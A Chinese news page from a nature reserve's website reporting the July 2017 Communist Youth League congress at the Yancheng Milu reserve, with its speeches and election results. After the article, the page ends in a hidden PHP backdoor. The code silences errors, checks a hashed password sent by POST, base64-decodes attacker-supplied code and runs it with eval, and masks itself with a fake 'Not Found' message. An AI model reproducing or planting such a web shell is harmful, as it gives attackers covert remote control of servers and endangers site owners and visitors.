最新要闻

首页 > 最新要闻 >

    共青团盐城市麋鹿自然保护区委员会 第二次团员代表大会胜利召开

               2017年7月31日下午,共青团盐城市麋鹿自然保护区委员会第二次团员代表大会在管理处一楼会议室正式召开。麋鹿保护区管理处副主任沈华出席,办公室主任王立波主持。

     

    大会共四项议程,由盐城市神鹿生态旅游发展有限公司副总经理袁红平同志致开幕词,她强调,要深入贯彻“十八届六中全会”精神和市委第七次党代会精神,在今后三年中,带领全体团员青年坚定正确方向,站在改革前列,在献身改革和建设的实践中培养和造就可靠的社会主义事业的建设者和接班人,把我区野生动物保护和生态旅游事业推向新的发展高潮。

     

    会上,沈主任发表重要讲话,首先对本次团员代表大会的胜利召开表示热烈祝贺并回顾了大丰麋鹿自然保护区的发展历程。借此机会,他也对全区团员青年提了几点要求和希望:一、团员青年要高举党的伟大旗帜,努力成为实现共产主义的远大理想、坚定共产主义信念的一代新人;二、团员青年要加强学习,努力成为学有所长,奋发成才的一代新人;三、团员青年要以创建国内一流、国际领先的自然保护区为目标,与时俱进,努力成为开拓创新、艰苦奋斗的一代新人;四、团员青年要弘扬新风,努力成为传承文明、奉献社会的一代新人。

     

    大会第三项,由王立波同志宣读选举投票办法及候选人名单。采用无记名差额投票的方式选举产生了第二届团委会,袁红平同志当选为团委书记,薛丹丹同志当选为副书记。王婷峰、陈为霞、陆立林、杭英、俞晓鹏五位同志当选为委员。

     

    最后,袁红平同志作了总结发言,她说,要以这次大会为新的起点,把保护区的要求和大会的精神尽快落实到团员青年中去,满腔热情、信心百倍地去完成大会确定的各项任务,开创保护区共青团事业更加美好的未来!在热烈的掌声中共青团盐城市麋鹿自然保护区委员会第二次团员代表大会胜利闭幕。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>